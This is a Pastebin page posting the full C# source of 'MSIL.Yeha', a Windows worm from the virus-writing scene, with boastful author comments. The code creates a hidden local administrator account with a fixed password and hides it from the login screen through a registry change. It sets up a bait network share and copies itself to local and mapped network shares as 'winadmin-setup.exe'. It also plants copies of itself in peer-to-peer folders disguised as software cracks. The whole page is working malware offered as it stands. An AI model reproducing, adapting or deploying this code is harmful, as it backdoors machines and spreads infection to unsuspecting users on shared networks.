FlyFar

MSIL.Yeha - Source Code

Jun 26th, 2023
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 9.86 KB | Cybersecurity | 0 0
  1. /*************************************************************
  2.  * C# - MSIL.Yeha
  3.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  4.  * by free0n
  5.  * vx13d.net free0n@vx13d.net
  6.  * ###########################################################
  7.  *
  8.  * Yeha works by first checking itself in the registry
  9.  * if it hasn't ran yet it will attempt to create a
  10.  * new hidden local admin user account named Yeha with the
  11.  * password yehawashere. After the account is created
  12.  * it creates a new network share in C:\Yeha and makes the
  13.  * directory as hidden. This is so if someone is browsing
  14.  * the network we might lure them in. Each time the exe
  15.  * is run it will spread to any open network shares that
  16.  * were found in the mru list in the registry. It copies
  17.  * as winadmin-setup.exe.
  18.  *
  19.  * After the share spreading is completed it copies itself
  20.  * to commonly shared p2p folders as cracks for programs
  21.  * found in the program files directory. For example if
  22.  * Trilian directory is found it creates a trillian-crack.exe
  23.  * once the p2p is done it will display message if the day
  24.  * is the 25th that Yeha has been here if it's not it
  25.  * displays a common windows error message.
  26.  *
  27.  * Note: This uses the same trick as Snoopy did as
  28.  * it looks like a console application but the output
  29.  * type is windows application so we don't get a dorky
  30.  * cmd window popping up when it's ran. Compiled with
  31.  * MS Visual C# express
  32.  *
  33.  * thx RRLF!
  34.  * keep vxing!
  35.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  36.  ************************************************************/
  37. /************************************************************
  38.  * Start of Program.cs
  39.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  40.  ************************************************************/
  41.  
  42. using System;
  43. using System.Collections.Generic;
  44. using System.Text;
  45. using System.Windows.Forms;
  46. using System.IO;
  47.  
  48. namespace Yeha {
  49.  
  50.     class Program {
  51.  
  52.         static void Main(string[] args) {
  53.  
  54.             Yeha yeha = new Yeha();
  55.             if (!yeha.chkIt()) {
  56.                 yeha.YehaUser();
  57.                 yeha.CreateShare(@"C:\Yeha", "Yeha");
  58.             }
  59.            
  60.             yeha.Share();
  61.             yeha.p2p();
  62.            
  63.             if (DateTime.Now.Day == 25) {
  64.                 MessageBox.Show("Yeha was here!", "Yeha", MessageBoxButtons.OK, MessageBoxIcon.Information);
  65.             } else {
  66.                 MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Error);
  67.             }
  68.         }
  69.     }
  70. }
  71.  
  72. /************************************************************
  73.  * Start of Yeha.cs
  74.  * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  75.  ************************************************************/
  76.  
  77. using System;
  78. using System.Text;
  79. using System.IO;
  80. using System.Diagnostics;
  81. using System.DirectoryServices;
  82. using Microsoft.Win32;
  83. using System.Collections;
  84. using System.Collections.Generic;
  85. using System.Management;
  86.  
  87. namespace Yeha {
  88.  
  89.     class Yeha {
  90.  
  91.         private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
  92.        
  93.         public bool chkIt() {
  94.             //checking the registry to see if we have already ran. If
  95.             //we aren't found in the registry we add the value.
  96.             //Hkey local machine is good real estate ;)
  97.  
  98.             string regstr = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Yeha", "Yeha", "Yeha");
  99.             if (regstr == "Yeha") {
  100.                 return true;
  101.             } else {
  102.                 RegistryKey key = Registry.LocalMachine.OpenSubKey("Software", true);
  103.                 RegistryKey newkey = key.CreateSubKey("Yeha");
  104.                 newkey.SetValue("Yeha", me);
  105.                 return false;
  106.             }
  107.         }
  108.        
  109.         public void p2p() {
  110.  
  111.             //our p2p spreading is basically just a list of common folders
  112.             //if the folder exists we drop a copies of ourselves as cracks
  113.             //for programs we find the program files folder
  114.  
  115.             ArrayList arSharedFolders = new ArrayList();
  116.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Downloads");
  117.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\My Shared Folder");
  118.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Shared");
  119.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Ares\\My Shared Folder");
  120.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\Downloads");
  121.             arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\Shareaza\\Downloads");
  122.  
  123.             IEnumerator folder = arSharedFolders.GetEnumerator();
  124.             while (folder.MoveNext()) {
  125.                 string tada = Convert.ToString(folder.Current);
  126.                 if (Directory.Exists(tada)) {
  127.                     string progDir = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
  128.                     foreach (string d in Directory.GetDirectories(progDir)) {
  129.                         string app = tada + "\\" + d.Substring(d.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
  130.                         File.Copy(me, app, true);
  131.                     }
  132.                 }
  133.             }
  134.         }
  135.  
  136.         public void YehaUser() {
  137.  
  138.             try {
  139.  
  140.                 //create our new admin user account on the local machine we are running on.
  141.                 DirectoryEntry ad = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
  142.                 DirectoryEntry usr = ad.Children.Add("Yeha", "user");
  143.                 usr.Invoke("SetPassword", new object[] { "yehawashere" });
  144.                 usr.CommitChanges();
  145.  
  146.                 DirectoryEntry de;
  147.                 de = ad.Children.Find("Administrators", "group");
  148.                 if (de != null) {
  149.                     de.Invoke("Add", new object[] { usr.Path.ToString() });
  150.                 }
  151.                
  152.                 //now we need to make the user hidden from the login screen and the
  153.                 //user accounts applet in the control panel to do this we
  154.                 //use a reg hack.
  155.  
  156.                 try {
  157.                     string rkey = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList";
  158.                     Registry.SetValue(rkey, "Yeha", 0, RegistryValueKind.DWord);
  159.                 } catch (Exception er) { }
  160.  
  161.             } catch (Exception ex) { }
  162.         }
  163.  
  164.         public void Share() {
  165.  
  166.             //copy ourselves to all the local network shares on the computer
  167.             //this could be good bait when someone connects and wonders what
  168.             //winadmin-setup is.
  169.  
  170.             try {
  171.                 ManagementObjectSearcher shares = new
  172.                 ManagementObjectSearcher("select * from win32_share");
  173.                 foreach (ManagementObject serv in shares.Get()) {
  174.                     string shareName = Convert.ToString(serv["Name"]);
  175.                     if (!shareName.Contains("$")) {
  176.                         File.Copy(me, @"\\" + Environment.MachineName + @"\" + shareName + @"\winadmin-setup.exe", true);
  177.                     }
  178.                 }
  179.             } catch (Exception ex) { }
  180.  
  181.             //now we need to copy ourselves to other shares
  182.             //on the network to do this we check for network shares
  183.             //in the MRU list, we may get lucky we may not
  184.  
  185.             try {
  186.                 string key = @"Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU\";
  187.                 RegistryKey reg = Registry.CurrentUser.OpenSubKey(key); ;
  188.                 foreach (string valuename in reg.GetValueNames()) {
  189.                     string path = reg.GetValue(valuename).ToString();
  190.                     if (valuename.ToLower() != "mrulist") {
  191.                         try {
  192.                             File.Copy(me, path + @"\\winadmin-setup.exe", true);
  193.                         } catch (Exception er) {
  194.                             continue;
  195.                         }
  196.                     }
  197.                 }
  198.                 reg.Close();
  199.             } catch (Exception er) { }
  200.         }
  201.  
  202.         public void CreateShare(string dir, string name) {
  203.            
  204.             //we create our own shared folder on the network called Yeha
  205.             //this is so if we get a user browsing the network they might
  206.             //open it up and double click winadmin-setup.exe. You know a user
  207.             //might be more susceptible to pick it up if the folder was
  208.             //named pr0n or porn hehehe.
  209.  
  210.             try {
  211.                 Directory.CreateDirectory(dir);
  212.                 ManagementClass managementClass = new ManagementClass("Win32_Share");
  213.                 ManagementBaseObject inParams = managementClass.GetMethodParameters("Create");
  214.                 ManagementBaseObject outParams;
  215.                 inParams["Description"] = name;
  216.                 inParams["Name"] = name;
  217.                 inParams["Path"] = dir;
  218.                 inParams["Type"] = 0x0;
  219.                 outParams = managementClass.InvokeMethod("Create", inParams, null);
  220.                
  221.                 //if the return value was 0 then we know we got the folder created
  222.                 //so we are going to make it hidden..
  223.                 if ((uint)(outParams.Properties["ReturnValue"].Value) == 0) {
  224.             //make the dir hidden
  225.                     if (Directory.Exists(dir)) {
  226.                         DirectoryInfo d = new DirectoryInfo(dir);
  227.                         d.Attributes = FileAttributes.Hidden;
  228.                     }
  229.                 }
  230.            
  231.             } catch (Exception e) { }
  232.         }
  233.     }
  234. }
  235.  
  236.  
  237.  
  238.  
Add Comment
Please, Sign In to add comment